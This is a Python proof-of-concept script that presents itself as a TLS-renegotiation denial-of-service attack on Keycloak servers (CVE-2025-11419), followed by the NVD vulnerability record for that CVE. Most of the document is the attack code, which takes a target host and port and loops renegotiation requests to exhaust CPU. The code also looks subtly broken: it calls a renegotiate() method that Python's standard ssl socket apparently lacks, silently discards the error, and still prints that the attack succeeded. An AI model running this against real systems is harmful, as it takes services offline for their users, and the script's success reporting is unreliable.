CVE-2025-11419

#!/usr/bin/env python3 # CVE-2025-11419 PoC - Keycloak TLS Renegotiation DoS # Description: Exhaust server CPU by sending repeated TLS 1.2 renegotiation requests import socket import ssl import time import sys def create_tls_connection(host, port): """Create initial TLS 1.2 connection""" context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) context.minimum_version = ssl.TLSVersion.TLSv1_2 context.check_hostname = False context.verify_mode = ssl.CERT_NONE sock = socket.create_connection((host, port), timeout=10) ssock = context.wrap_socket(sock, server_hostname=host) return ssock def send_renegotiation_request(ssock): """Send TLS renegotiation request to exhaust server resources""" try: # Trigger renegotiation - this causes server to perform new handshake ssock.renegotiate() return True except Exception as e: return False def dos_attack(host, port, num_requests, delay=0.01): """Perform DoS attack via TLS renegotiation""" print(f"[*] Starting TLS Renegotiation DoS attack against {host}:{port}") print(f"[*] Target: Keycloak CVE-2025-11419") print(f"[*] Sending {num_requests} renegotiation requests...") ssock = create_tls_connection(host, port) print(f"[+] Initial TLS connection established") success_count = 0 for i in range(num_requests): if send_renegotiation_request(ssock): success_count += 1 if (i + 1) % 100 == 0: print(f"[*] Progress: {i+1}/{num_requests} requests sent") time.sleep(delay) print(f"[+] Completed: {success_count} renegotiation requests sent") ssock.close() if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <host> <port> [num_requests] [delay]") print(f"Example: {sys.argv[0]} keycloak.example.com 8443 10000 0.001") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) num_requests = int(sys.argv[3]) if len(sys.argv) > 3 else 5000 delay = float(sys.argv[4]) if len(sys.argv) > 4 else 0.01 dos_attack(host, port, num_requests, delay) print("[*] Attack completed - server CPU should be exhausted")

{"cve": {"id": "CVE-2025-11419", "sourceIdentifier": "[email protected]", "published": "2025-12-23T21:15:46.557", "lastModified": "2026-04-20T18:16:22.450", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. This vulnerability allows an unauthenticated remote attacker to cause a denial of service (DoS) by repeatedly initiating TLS 1.2 client-initiated renegotiation requests to exhaust server CPU resources, making the service unavailable."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:18254", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:18255", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:18889", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2025:18890", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-11419", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402142", "source": "[email protected]"}, {"url": "https://github.com/keycloak/keycloak/discussions/25209", "source": "[email protected]"}, {"url": "https://github.com/keycloak/keycloak/issues/43020", "source": "[email protected]"}]}}